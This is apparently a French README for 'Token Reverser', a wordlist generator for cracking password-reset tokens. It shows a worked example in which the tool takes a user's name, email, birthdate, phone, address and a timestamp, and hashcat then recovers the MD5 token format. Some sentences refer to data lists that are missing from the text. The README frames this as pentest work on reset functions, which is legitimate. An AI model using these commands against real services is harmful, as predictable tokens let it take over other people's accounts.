
Générateur de listes de mots pour casser des jetons de sécurité
Générateur de listes de mots pour craquer les jetons de sécurité.
$ git clone https://github.com/dariusztytko/token-reverser.git
Vous testez la fonction de réinitialisation de mot de passe
Un jeton de réinitialisation de mot de passe a été envoyé à votre boîte mail (par ex. 582431d4c7b57cb4a3570041ffeb7e10)
Vous supposez qu'il s'agit d'un hachage md5 des données que vous avez fournies lors de l'inscription
Lors de l'inscription, vous avez saisi les données suivantes :
De plus, vous avez accès aux données supplémentaires suivantes :
Utilisez Token Reverser pour générer une liste de mots à partir des données connues :
python3 token-reverser.py --date "Tue, 10 Mar 2020 17:12:59 GMT" Foo Bar [email protected] 1985-05-23 202-555-0185 "3634 Forest Drive" 74824 > words
Utilisez hashcat pour craquer le jeton de réinitialisation de mot de passe :
hashcat64.exe -m 0 582431d4c7b57cb4a3570041ffeb7e10 words
hashcat (v5.1.0) starting...
[...]
582431d4c7b57cb4a3570041ffeb7e10:[email protected]!1583860379
Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: 582431d4c7b57cb4a3570041ffeb7e10
[...]
Vous savez maintenant que les jetons de réinitialisation de mot de passe sont générés comme suit :
md5(user ID!first name!last name!email!current timestamp)
usage: token-reverser.py [-h] [-d DATE] [-o TIMESTAMP_OFFSET] [-s SEPARATORS]
data [data ...]
Words list generator to crack security tokens v1.2
positional arguments:
data data chunks
optional arguments:
-h, --help show this help message and exit
-d DATE, --date DATE timestamp from this date will be used as an additional
data chunk, example: Tue, 10 Mar 2020 14:06:36 GMT
-o TIMESTAMP_OFFSET, --timestamp-offset TIMESTAMP_OFFSET
how many previous (to timestamp from date) timestamps
should be used as an additional data chunks, default: 1
-s SEPARATORS, --separators SEPARATORS
data chunks separators to check, default:
~`!@#$%^&*()_+-={}|[]\:";'<>?,./ \t
Veuillez consulter le CHANGELOG